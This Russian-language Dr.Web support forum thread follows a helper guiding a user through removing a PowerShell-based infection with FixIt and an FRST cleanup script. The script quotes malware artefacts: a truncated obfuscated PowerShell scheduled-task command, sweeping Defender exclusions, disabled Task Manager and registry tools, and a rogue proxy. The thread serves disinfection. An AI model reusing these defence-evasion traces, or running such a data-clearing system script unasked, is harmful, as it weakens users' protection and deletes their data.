Использование Javascript отключено

Javascript отключен. В результате, некоторые функции могут не работать. Для возобновления полноценного функционирования форума, включите Javascript.

Поймал вирус dpc:powershell.avkill.10

Автор ap0logies , сен 14 2025 16:19

powershell avkill.10

Please log in to reply

18 ответов в этой теме

#1 ap0logies

Newbie

Posters
9 Сообщений:

Отправлено 14 Сентябрь 2025 - 16:19

Словил где то вирус запустил сканирование в drWeb, что то нашло и удалилось а что то осталось. Сейчас спамит уведомление DPC:PowerShell.AVKill.10. Помогите пожалуйста, сканирование Dr.Web Fixlt я прикрепил как и FRST с Addiction. https://disk.yandex.ru/d/Y4VP0MisixdsBQ

Прикрепленные файлы:

FRST.txt 93,87К 0 Скачано раз
Addition.txt 87,39К 0 Скачано раз

Наверх

#2 ap0logies

Newbie

Posters
9 Сообщений:

Отправлено 14 Сентябрь 2025 - 16:58

Перезагрузил компьютер уведомления больше не приходят, но я не уверен что стало с вирусом

Наверх

#3 Severnyj

Member

Posters
255 Сообщений:

Отправлено 14 Сентябрь 2025 - 17:38

Лог скачан и анализируется, ожиидайте.

Наверх

#4 Severnyj

Member

Posters
255 Сообщений:

Отправлено 14 Сентябрь 2025 - 18:03

Скачайте утилиту Dr.Web FixIt! и сохраните её на Рабочем столе.

Запустите скачанный файл.

Нажмите кнопку «Начать сканирование», чтобы начать сканирование.

По завершении работы программы в папке C:\Users\<пользователь>\Doctor Web будет создан архив с отчетом вида Имя_компьютера_Дата_Время.zip.

Пожалуйста, выложите отчет на Яндекс-Диск или в Облако Mail.ru ссылку укажите в своем следующем сообщении.

Наверх

#5 ap0logies

Newbie

Posters
9 Сообщений:

Отправлено 14 Сентябрь 2025 - 18:24

Так уже минут 5-10

Прикрепленные файлы:

Снимок экрана 2025-09-14 182231.png 117,33К 0 Скачано раз

Наверх

#6 Severnyj

Member

Posters
255 Сообщений:

Отправлено 14 Сентябрь 2025 - 18:31

Попробуйте скачать по этой ссылке: https://drw.sh/opecbj

Наверх

#7 Severnyj

Member

Posters
255 Сообщений:

Отправлено 14 Сентябрь 2025 - 18:38

+ зеркало на Яндексе

Наверх

#8 ap0logies

Newbie

Posters
9 Сообщений:

Отправлено 14 Сентябрь 2025 - 19:05

Это не быстро(

Прикрепленные файлы:

Снимок экрана 2025-09-14 190529.png 9,36К 0 Скачано раз

Сообщение было изменено ap0logies: 14 Сентябрь 2025 - 19:06

Наверх

#9 Severnyj

Member

Posters
255 Сообщений:

Отправлено 14 Сентябрь 2025 - 19:15

Ok.

Наверх

#10 ap0logies

Newbie

Posters
9 Сообщений:

Отправлено 14 Сентябрь 2025 - 20:10

Вот https://disk.yandex.ru/d/jLl0ZcH4u9fBlw

Наверх

#11 Severnyj

Member

Posters
255 Сообщений:

Отправлено 14 Сентябрь 2025 - 20:30

Хорошо, смотрю вредоносного задания уже нет. Подготовьте теперь новые логи FRST (старые FRST.txt и Addition.txt можете удалить в корзину)

Наверх

#12 ap0logies

Newbie

Posters
9 Сообщений:

Отправлено 14 Сентябрь 2025 - 20:36

Вот

Прикрепленные файлы:

Addition.txt 59,8К 5 Скачано раз
FRST.txt 93,25К 5 Скачано раз

Наверх

#13 Severnyj

Member

Posters
255 Сообщений:

Отправлено 14 Сентябрь 2025 - 21:02

Примите к сведению - после выполнения скрипта временные файлы, корзина, история браузеров, куки и кэш будут очищены.
Отключите до перезагрузки антивирус.
Выделите следующий код:

Spoiler

Start::
CloseProcesses:
SystemRestore: On
CreateRestorePoint:
Unlock: C:\FRST\
RemoveProxy:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Microsoft\MRT: Ограничение <==== ВНИМАНИЕ
HKU\S-1-5-18\...\Run: [DCv2] => C:\WINDOWS\system32\config\systemprofile\AppData\Local\Microsoft\DCv2.exe (Нет файла)
HKU\S-1-5-18\...\Policies\system: [DisableRegistryTools] 2
HKU\S-1-5-18\...\Policies\system: [DisableTaskMgr] 1
HKU\S-1-5-21-4073194382-1018083982-681676505-1001\SOFTWARE\Policies\Google: Ограничение <==== ВНИМАНИЕ
Task: {62E1E588-E07C-4268-BFFF-2269B99ECB3E} - System32\Tasks\dialersvc64 => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [454656 2025-09-10] (Microsoft Windows -> Microsoft Corporation) -> "function Local:jpUtRkTRIjen{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$joTDXxkVGEteUZ,[Parameter(Position=1)][Type]$ikVPjZThoQ)$fZrQtpljABG=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Ch (запись имеет ещё 4936 символов). <==== ВНИМАНИЕ
Task: {7CC80A61-9CD1-42B9-AE20-D7DE4D781C14} - System32\Tasks\smartscreen => C:\Users\User\AppData\Local\Epic Games\smartscreen.exe  (Нет файла) <==== ВНИМАНИЕ
Task: {72712152-26CC-4089-B3A3-8EDB54C8608B} - System32\Tasks\smss => C:\Users\User\AppData\Local\IsolatedStorage\smss.exe  (Нет файла) <==== ВНИМАНИЕ
Task: {7885C482-D3F1-4DB8-9A23-EAC80041D57F} - System32\Tasks\WMIRegistrationService => C:\Program Files (x86)\EasyAntiCheat\WMIRegistrationService.exe  (Нет файла)
ProxyServer: [S-1-5-21-4073194382-1018083982-681676505-1001] => 127.0.0.1:2080
Edge HomePage: Default -> hxxps://find-it.pro/?utm_source=distr_m
C:\Users\User\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem
Edge HKU\S-1-5-21-4073194382-1018083982-681676505-1001\SOFTWARE\Microsoft\Edge\Extensions\...\Edge\Extension: [llbjbkhnmlidjebalopleeepgdfgcpec] - C:\Program Files (x86)\Internet Download Manager\IDMEdgeExt.crx [2025-06-13]
FF Plugin: @wanmei.com/npArcPlayNowPlugin ->  [Нет файла]
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2025-06-13]
CHR HKU\S-1-5-21-4073194382-1018083982-681676505-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fhkbfkkohcdgpckffakhbllifkakihmh]
CHR HKU\S-1-5-21-4073194382-1018083982-681676505-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2025-06-13]
CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2025-06-13]
S2 BITS_bkp; C:\WINDOWS\System32\qmgr.dll [1474560 2025-09-10] (Microsoft Windows -> Microsoft Corporation)
U2 dosvc_bkp; C:\WINDOWS\system32\dosvc.dll [98304 2025-09-10] (Microsoft Windows -> Microsoft Corporation)
S2 UsoSvc_bkp; C:\WINDOWS\system32\usosvc.dll [114688 2025-09-10] (Microsoft Windows -> Microsoft Corporation)
S3 WaaSMedicSvc_bkp; C:\WINDOWS\System32\WaaSMedicSvc.dll [94208 2025-09-10] (Microsoft Windows -> Microsoft Corporation)
S3 wuauserv_bkp; C:\WINDOWS\system32\wuaueng.dll [184720 2025-09-10] (Microsoft Windows -> Корпорация Майкрософт)
U4 mkYTXZFxxfiMHnxJg; \??\C:\Users\User\AppData\Local\Temp\mkYTXZFxxfiMHnxJg [X] <==== ВНИМАНИЕ
2025-09-14 03:32 - 2025-09-14 03:32 - 000000000 ____D C:\ProgramData\F-Secure
2025-09-13 18:02 - 2025-09-14 13:21 - 000013376 _____ C:\WINDOWS\system32\Tasks\dialersvc64
2025-09-13 18:02 - 2025-09-13 18:02 - 000004678 _____ C:\WINDOWS\system32\Tasks\WMIRegistrationService
2025-09-13 18:02 - 2025-09-13 18:02 - 000004642 _____ C:\WINDOWS\system32\Tasks\smartscreen
2025-09-13 18:02 - 2025-09-13 18:02 - 000004634 _____ C:\WINDOWS\system32\Tasks\smss
AlternateDataStreams: C:\WINDOWS\tracing:? [16]
AlternateDataStreams: C:\Users\Public\desktop.ini:WinDeviceId [64]
AlternateDataStreams: C:\Users\User\Application Data:d0353b486a0f166ba47ab293d0b1004e [394]
AlternateDataStreams: C:\Users\User\AppData\Roaming:d0353b486a0f166ba47ab293d0b1004e [394]
StartPowershell:
Remove-MpPreference -ExclusionPath "C:\korepi"
Remove-MpPreference -ExclusionPath "C:/"
Remove-MpPreference -ExclusionPath "C:\Users\User"
Remove-MpPreference -ExclusionPath "C:\ProgramData"
Remove-MpPreference -ExclusionPath "C:\WINDOWS"
Remove-MpPreference -ExclusionPath "C:\WINDOWS\system32\config\systemprofile"
Remove-MpPreference -ExclusionPath "C:\ProgramData"
Remove-MpPreference -ExclusionPath "C:\Program Files"
Remove-MpPreference -ExclusionPath "C:\Program Files (x86)"
Remove-MpPreference -ExclusionPath "C:\Users\User\AppData\Roaming"
Remove-MpPreference -ExclusionPath "C:\Users\User\AppData\Local"
Remove-MpPreference -ExclusionPath "C:\WINDOWS\system32\config\systemprofile\AppData\Roaming"
Remove-MpPreference -ExclusionPath "C:\WINDOWS\system32\config\systemprofile\AppData\Local"
Remove-MpPreference -ExclusionExtension ".exe"
EndPowerShell:
StartRegedit:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS]
"DependOnService"=hex(7):52,00,70,00,63,00,53,00,73,00,00,00,00,00
"Description"="@%SystemRoot%\\system32\\qmgr.dll,-1001"
"DisplayName"="@%SystemRoot%\\system32\\qmgr.dll,-1000"
"ErrorControl"=dword:00000001
"FailureActions"=hex:80,51,01,00,00,00,00,00,00,00,00,00,03,00,00,00,14,00,00,\
  00,01,00,00,00,60,ea,00,00,01,00,00,00,c0,d4,01,00,00,00,00,00,00,00,00,00
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
  74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,\
  00,76,00,63,00,68,00,6f,00,73,00,74,00,2e,00,65,00,78,00,65,00,20,00,2d,00,\
  6b,00,20,00,6e,00,65,00,74,00,73,00,76,00,63,00,73,00,20,00,2d,00,70,00,00,\
  00
"ObjectName"="LocalSystem"
"RequiredPrivileges"=hex(7):53,00,65,00,43,00,72,00,65,00,61,00,74,00,65,00,47,\
  00,6c,00,6f,00,62,00,61,00,6c,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,00,\
  67,00,65,00,00,00,53,00,65,00,49,00,6d,00,70,00,65,00,72,00,73,00,6f,00,6e,\
  00,61,00,74,00,65,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,\
  00,00,53,00,65,00,54,00,63,00,62,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,\
  00,67,00,65,00,00,00,53,00,65,00,41,00,73,00,73,00,69,00,67,00,6e,00,50,00,\
  72,00,69,00,6d,00,61,00,72,00,79,00,54,00,6f,00,6b,00,65,00,6e,00,50,00,72,\
  00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,53,00,65,00,49,00,6e,00,\
  63,00,72,00,65,00,61,00,73,00,65,00,51,00,75,00,6f,00,74,00,61,00,50,00,72,\
  00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,53,00,65,00,44,00,65,00,\
  62,00,75,00,67,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,\
  00,00,00
"ServiceSidType"=dword:00000001
"Start"=dword:00000003
"Type"=dword:00000020
"DelayedAutostart"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS\Parameters]
"ServiceDll"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,\
  00,74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,\
  71,00,6d,00,67,00,72,00,2e,00,64,00,6c,00,6c,00,00,00
"ServiceDllUnloadOnStop"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS\Performance]
"Close"="PerfMon_Close"
"Collect"="PerfMon_Collect"
"Library"="C:\\Windows\\System32\\bitsperf.dll"
"Open"="PerfMon_Open"
"InstallType"=dword:00000001
"PerfIniFile"="bitsctrs.ini"
"First Counter"=dword:0000229a
"Last Counter"=dword:000022aa
"First Help"=dword:0000229b
"Last Help"=dword:000022ab
"Object List"="8858"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS\Security]
"Security"=hex:01,00,14,80,90,00,00,00,a0,00,00,00,14,00,00,00,34,00,00,00,02,\
  00,20,00,01,00,00,00,02,c0,18,00,00,00,0c,00,01,02,00,00,00,00,00,05,20,00,\
  00,00,20,02,00,00,02,00,5c,00,04,00,00,00,00,02,14,00,ff,01,0f,00,01,01,00,\
  00,00,00,00,05,12,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,\
  20,00,00,00,20,02,00,00,00,00,14,00,8d,01,02,00,01,01,00,00,00,00,00,05,04,\
  00,00,00,00,00,14,00,8d,01,02,00,01,01,00,00,00,00,00,05,06,00,00,00,01,02,\
  00,00,00,00,00,05,20,00,00,00,20,02,00,00,01,02,00,00,00,00,00,05,20,00,00,\
  00,20,02,00,00


EndRegedit:
StartRegedit:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DoSvc]
"DependOnService"=hex(7):72,00,70,00,63,00,73,00,73,00,00,00,00,00
"Description"="@%systemroot%\\system32\\dosvc.dll,-101"
"DisplayName"="@%systemroot%\\system32\\dosvc.dll,-100"
"ErrorControl"=dword:00000001
"FailureActions"=hex:80,51,01,00,00,00,00,00,00,00,00,00,03,00,00,00,14,00,00,\
  00,01,00,00,00,60,ea,00,00,01,00,00,00,60,ea,00,00,00,00,00,00,00,00,00,00
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
  74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,\
  00,76,00,63,00,68,00,6f,00,73,00,74,00,2e,00,65,00,78,00,65,00,20,00,2d,00,\
  6b,00,20,00,4e,00,65,00,74,00,77,00,6f,00,72,00,6b,00,53,00,65,00,72,00,76,\
  00,69,00,63,00,65,00,20,00,2d,00,70,00,00,00
"LaunchProtected"=dword:00000002
"ObjectName"="NT Authority\\NetworkService"
"ServiceDll"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,\
  00,74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,\
  64,00,6f,00,73,00,76,00,63,00,2e,00,64,00,6c,00,6c,00,00,00
"ServiceDllUnloadOnStop"=dword:00000001
"ServiceSidType"=dword:00000001
"Start"=dword:00000003
"SvcMemHardLimitInMB"=dword:00000027
"SvcMemMidLimitInMB"=dword:0000001b
"SvcMemSoftLimitInMB"=dword:0000000f
"Type"=dword:00000010

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DoSvc\Security]
"Security"=hex:01,00,14,80,a0,00,00,00,ac,00,00,00,14,00,00,00,30,00,00,00,02,\
  00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,\
  00,00,02,00,70,00,04,00,00,00,00,00,14,00,9d,00,02,00,01,01,00,00,00,00,00,\
  05,0b,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,\
  20,02,00,00,00,00,14,00,ff,01,0f,00,01,01,00,00,00,00,00,05,12,00,00,00,00,\
  00,28,00,22,00,02,00,01,06,00,00,00,00,00,05,50,00,00,00,4d,f8,19,b6,b3,a7,\
  7f,e3,93,9a,10,ee,20,5d,51,ab,9b,39,b9,82,01,01,00,00,00,00,00,05,12,00,00,\
  00,01,01,00,00,00,00,00,05,12,00,00,00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DoSvc\TriggerInfo]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DoSvc\TriggerInfo\0]
"Action"=dword:00000001
"Data0"=hex:75,10,bc,a3,29,01,c6,41
"DataType0"=dword:00000001
"GUID"=hex:16,28,7a,2d,5e,0c,fc,45,9c,e7,57,0e,5e,cd,e9,c9
"Type"=dword:00000007

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DoSvc\TriggerInfo\1]
"Action"=dword:00000001
"GUID"=hex:e6,ca,9f,65,db,5b,a9,4d,b1,ff,ca,2a,17,8d,46,e0
"Type"=dword:00000005


EndRegedit:
StartRegedit:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsoSvc]
"DelayedAutoStart"=dword:00000001
"DependOnService"=hex(7):72,00,70,00,63,00,73,00,73,00,00,00,00,00
"Description"="@%systemroot%\\system32\\usosvc.dll,-102"
"DisplayName"="@%systemroot%\\system32\\usosvc.dll,-101"
"ErrorControl"=dword:00000001
"FailureActions"=hex:80,51,01,00,00,00,00,00,00,00,00,00,03,00,00,00,14,00,00,\
  00,01,00,00,00,c0,d4,01,00,01,00,00,00,e0,93,04,00,00,00,00,00,00,00,00,00
"ImagePath"=hex(2):25,00,73,00,79,00,73,00,74,00,65,00,6d,00,72,00,6f,00,6f,00,\
  74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,\
  00,76,00,63,00,68,00,6f,00,73,00,74,00,2e,00,65,00,78,00,65,00,20,00,2d,00,\
  6b,00,20,00,6e,00,65,00,74,00,73,00,76,00,63,00,73,00,20,00,2d,00,70,00,00,\
  00
"ObjectName"="LocalSystem"
"PreshutdownTimeout"=dword:0036ee80
"RequiredPrivileges"=hex(7):53,00,65,00,41,00,75,00,64,00,69,00,74,00,50,00,72,\
  00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,53,00,65,00,43,00,72,00,\
  65,00,61,00,74,00,65,00,47,00,6c,00,6f,00,62,00,61,00,6c,00,50,00,72,00,69,\
  00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,53,00,65,00,43,00,72,00,65,00,\
  61,00,74,00,65,00,50,00,61,00,67,00,65,00,46,00,69,00,6c,00,65,00,50,00,72,\
  00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,53,00,65,00,54,00,63,00,\
  62,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,53,00,65,\
  00,41,00,73,00,73,00,69,00,67,00,6e,00,50,00,72,00,69,00,6d,00,61,00,72,00,\
  79,00,54,00,6f,00,6b,00,65,00,6e,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,\
  00,67,00,65,00,00,00,53,00,65,00,49,00,6d,00,70,00,65,00,72,00,73,00,6f,00,\
  6e,00,61,00,74,00,65,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,\
  00,00,00,53,00,65,00,49,00,6e,00,63,00,72,00,65,00,61,00,73,00,65,00,51,00,\
  75,00,6f,00,74,00,61,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,\
  00,00,00,53,00,65,00,53,00,68,00,75,00,74,00,64,00,6f,00,77,00,6e,00,50,00,\
  72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,53,00,65,00,44,00,65,\
  00,62,00,75,00,67,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,\
  00,00,53,00,65,00,42,00,61,00,63,00,6b,00,75,00,70,00,50,00,72,00,69,00,76,\
  00,69,00,6c,00,65,00,67,00,65,00,00,00,53,00,65,00,52,00,65,00,73,00,74,00,\
  6f,00,72,00,65,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,\
  00,53,00,65,00,53,00,65,00,63,00,75,00,72,00,69,00,74,00,79,00,50,00,72,00,\
  69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,53,00,65,00,54,00,61,00,6b,\
  00,65,00,4f,00,77,00,6e,00,65,00,72,00,73,00,68,00,69,00,70,00,50,00,72,00,\
  69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,53,00,65,00,4c,00,6f,00,61,\
  00,64,00,44,00,72,00,69,00,76,00,65,00,72,00,50,00,72,00,69,00,76,00,69,00,\
  6c,00,65,00,67,00,65,00,00,00,53,00,65,00,4d,00,61,00,6e,00,61,00,67,00,65,\
  00,56,00,6f,00,6c,00,75,00,6d,00,65,00,50,00,72,00,69,00,76,00,69,00,6c,00,\
  65,00,67,00,65,00,00,00,53,00,65,00,53,00,79,00,73,00,74,00,65,00,6d,00,45,\
  00,6e,00,76,00,69,00,72,00,6f,00,6e,00,6d,00,65,00,6e,00,74,00,50,00,72,00,\
  69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,53,00,65,00,43,00,72,00,65,\
  00,61,00,74,00,65,00,53,00,79,00,6d,00,62,00,6f,00,6c,00,69,00,63,00,4c,00,\
  69,00,6e,00,6b,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,\
  00,53,00,65,00,49,00,6e,00,63,00,72,00,65,00,61,00,73,00,65,00,42,00,61,00,\
  73,00,65,00,50,00,72,00,69,00,6f,00,72,00,69,00,74,00,79,00,50,00,72,00,69,\
  00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,00,00
"ServiceSidType"=dword:00000001
"Start"=dword:00000002
"Type"=dword:00000020

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsoSvc\Parameters]
"ServiceDll"=hex(2):25,00,73,00,79,00,73,00,74,00,65,00,6d,00,72,00,6f,00,6f,\
  00,74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,\
  75,00,73,00,6f,00,73,00,76,00,63,00,2e,00,64,00,6c,00,6c,00,00,00
"ServiceDllUnloadOnStop"=dword:00000001
"ServiceMain"="ServiceMain"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsoSvc\Security]
"Security"=hex:01,00,14,80,78,00,00,00,84,00,00,00,14,00,00,00,30,00,00,00,02,\
  00,1c,00,01,00,00,00,02,80,14,00,ff,00,0f,00,01,01,00,00,00,00,00,01,00,00,\
  00,00,02,00,48,00,03,00,00,00,00,00,14,00,9d,00,02,00,01,01,00,00,00,00,00,\
  05,0b,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,\
  20,02,00,00,00,00,14,00,ff,01,0f,00,01,01,00,00,00,00,00,05,12,00,00,00,01,\
  01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00


EndRegedit:
StartRegedit:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]
"DependOnService"=hex(7):72,00,70,00,63,00,73,00,73,00,00,00,00,00
"Description"="@%systemroot%\\system32\\wuaueng.dll,-106"
"DisplayName"="@%systemroot%\\system32\\wuaueng.dll,-105"
"ErrorControl"=dword:00000001
"FailureActions"=hex:80,51,01,00,00,00,00,00,00,00,00,00,03,00,00,00,14,00,00,\
  00,01,00,00,00,60,ea,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"ImagePath"=hex(2):25,00,73,00,79,00,73,00,74,00,65,00,6d,00,72,00,6f,00,6f,00,\
  74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,\
  00,76,00,63,00,68,00,6f,00,73,00,74,00,2e,00,65,00,78,00,65,00,20,00,2d,00,\
  6b,00,20,00,6e,00,65,00,74,00,73,00,76,00,63,00,73,00,20,00,2d,00,70,00,00,\
  00
"ObjectName"="LocalSystem"
"RequiredPrivileges"=hex(7):53,00,65,00,41,00,75,00,64,00,69,00,74,00,50,00,72,\
  00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,53,00,65,00,43,00,72,00,\
  65,00,61,00,74,00,65,00,47,00,6c,00,6f,00,62,00,61,00,6c,00,50,00,72,00,69,\
  00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,53,00,65,00,43,00,72,00,65,00,\
  61,00,74,00,65,00,50,00,61,00,67,00,65,00,46,00,69,00,6c,00,65,00,50,00,72,\
  00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,53,00,65,00,54,00,63,00,\
  62,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,53,00,65,\
  00,41,00,73,00,73,00,69,00,67,00,6e,00,50,00,72,00,69,00,6d,00,61,00,72,00,\
  79,00,54,00,6f,00,6b,00,65,00,6e,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,\
  00,67,00,65,00,00,00,53,00,65,00,49,00,6d,00,70,00,65,00,72,00,73,00,6f,00,\
  6e,00,61,00,74,00,65,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,\
  00,00,00,53,00,65,00,49,00,6e,00,63,00,72,00,65,00,61,00,73,00,65,00,51,00,\
  75,00,6f,00,74,00,61,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,\
  00,00,00,53,00,65,00,53,00,68,00,75,00,74,00,64,00,6f,00,77,00,6e,00,50,00,\
  72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,53,00,65,00,44,00,65,\
  00,62,00,75,00,67,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,\
  00,00,53,00,65,00,42,00,61,00,63,00,6b,00,75,00,70,00,50,00,72,00,69,00,76,\
  00,69,00,6c,00,65,00,67,00,65,00,00,00,53,00,65,00,52,00,65,00,73,00,74,00,\
  6f,00,72,00,65,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,\
  00,53,00,65,00,53,00,65,00,63,00,75,00,72,00,69,00,74,00,79,00,50,00,72,00,\
  69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,53,00,65,00,54,00,61,00,6b,\
  00,65,00,4f,00,77,00,6e,00,65,00,72,00,73,00,68,00,69,00,70,00,50,00,72,00,\
  69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,53,00,65,00,4c,00,6f,00,61,\
  00,64,00,44,00,72,00,69,00,76,00,65,00,72,00,50,00,72,00,69,00,76,00,69,00,\
  6c,00,65,00,67,00,65,00,00,00,53,00,65,00,4d,00,61,00,6e,00,61,00,67,00,65,\
  00,56,00,6f,00,6c,00,75,00,6d,00,65,00,50,00,72,00,69,00,76,00,69,00,6c,00,\
  65,00,67,00,65,00,00,00,53,00,65,00,53,00,79,00,73,00,74,00,65,00,6d,00,45,\
  00,6e,00,76,00,69,00,72,00,6f,00,6e,00,6d,00,65,00,6e,00,74,00,50,00,72,00,\
  69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,53,00,65,00,43,00,72,00,65,\
  00,61,00,74,00,65,00,53,00,79,00,6d,00,62,00,6f,00,6c,00,69,00,63,00,4c,00,\
  69,00,6e,00,6b,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,\
  00,53,00,65,00,49,00,6e,00,63,00,72,00,65,00,61,00,73,00,65,00,42,00,61,00,\
  73,00,65,00,50,00,72,00,69,00,6f,00,72,00,69,00,74,00,79,00,50,00,72,00,69,\
  00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,00,00
"ServiceSidType"=dword:00000001
"Start"=dword:00000003
"SvcMemHardLimitInMB"=dword:000000f6
"SvcMemMidLimitInMB"=dword:000000a7
"SvcMemSoftLimitInMB"=dword:00000058
"Type"=dword:00000020

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv\Parameters]
"ServiceDll"=hex(2):25,00,73,00,79,00,73,00,74,00,65,00,6d,00,72,00,6f,00,6f,\
  00,74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,\
  77,00,75,00,61,00,75,00,65,00,6e,00,67,00,2e,00,64,00,6c,00,6c,00,00,00
"ServiceDllUnloadOnStop"=dword:00000001
"ServiceMain"="WUServiceMain"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv\Security]
"Security"=hex:01,00,14,80,78,00,00,00,84,00,00,00,14,00,00,00,30,00,00,00,02,\
  00,1c,00,01,00,00,00,02,80,14,00,ff,00,0f,00,01,01,00,00,00,00,00,01,00,00,\
  00,00,02,00,48,00,03,00,00,00,00,00,14,00,9d,00,02,00,01,01,00,00,00,00,00,\
  05,0b,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,\
  20,02,00,00,00,00,14,00,ff,01,0f,00,01,01,00,00,00,00,00,05,12,00,00,00,01,\
  01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv\TriggerInfo]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv\TriggerInfo\0]
"Type"=dword:00000005
"Action"=dword:00000001
"Guid"=hex:e6,ca,9f,65,db,5b,a9,4d,b1,ff,ca,2a,17,8d,46,e0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv\TriggerInfo\1]
